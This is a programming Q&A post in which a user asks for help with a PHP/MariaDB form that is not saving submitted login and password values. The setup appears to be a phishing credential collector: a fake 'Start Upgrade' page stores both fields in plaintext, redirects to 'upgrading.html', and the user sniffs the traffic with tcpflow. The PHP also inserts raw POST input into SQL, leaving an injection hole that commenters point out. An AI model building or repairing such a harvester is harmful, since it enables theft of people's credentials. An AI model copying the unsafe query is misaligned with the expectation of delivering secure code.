0

Can somebody please help me to figure out why all new logins are not recorded into DB? I have such environment:

MariaDB:

MariaDB [(none)]> select * from db.table;
| id | password1 | password2 |

nginx with such file dbconnect.php:

<?php
session_start();
ob_start();
$host="localhost";
$username="name";
$pass="password";
$dbname="db";
$tbl_name="table";

// Create connection
$conn = mysqli_connect($host, $username, $pass, $dbname);
// Check connection
if ($conn) {
    $password1=$_POST['password1'];
        $password2=$_POST['password2'];

        $sql = "INSERT INTO table (password1, password2) VALUES ('$password1', '$password2')";
        if (mysqli_query($conn, $sql)) {
        echo "New record created successfully";
        } else {
                echo "Error: " . $sql . "<br>" . mysqli_error($conn);
        }

        mysqli_close($conn);
}

sleep(2);
header("location:upgrading.html");
ob_end_flush();
?>

html page:

<form method="POST" action="dbconnect.php">
          <label>login:</label>
          <input class="form-control" type="password" name="password1" required="required">
          <label>password:</label>
          <input class="form-control" type="password" name="password2" required="required">
          <input type="submit" value="Start Upgrade" class="btn btn-primart" />
</form>

But after entering data in those fields (password1 and password2) and submitting via WEB, DB is not updated with them though I can see the entered data using this command online:

sudo tcpflow -i any -C -g port 80 | grep -i "password1="

But after entering credentials into the WebForm, I get 405 method not allowed. Perhaps there is a reason why data is not recorded into DB. Trying to fix it.

Vofer
  • 1
  • 2
  • 1
    Your code seems to be vulnerable to **sql injection** attacks. Please read [this question](https://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php) and use prepared sql statements! – ventiseis Mar 10 '19 at 19:26
  • Furthermore, your password table seems to require an `id`, which is not supplied in your query. – ventiseis Mar 10 '19 at 19:28
  • And finally, you should only store a _hash_ of the password, not the password itself! More details [here](https://stackoverflow.com/questions/30279321/how-to-use-password-hash). – ventiseis Mar 10 '19 at 19:30
  • @ventiseis thx a lot for the useful advices!!. I've already added *id* (auto increment) to table and later I will update code to prevent SQL attacks and storing passwords via HASH. I've just tried to set up this environment at first and decided to check whether it works or not. Probably I missed something because data is not recorded into DB – Vofer Mar 10 '19 at 20:03
  • *`INSERT INTO table ...`* - As @ventiseis stated, you have a potential for a SQL Injection. You should probably use bound parameters. Also see [How to bind SQL variables in PHP?](https://stackoverflow.com/q/1860130/608639) – jww Mar 11 '19 at 08:58
  • @jww thx for that. I will fix it a bit later. Currently I do not know how to record my data from WEB form into DB( – Vofer Mar 11 '19 at 10:20

0 Answers0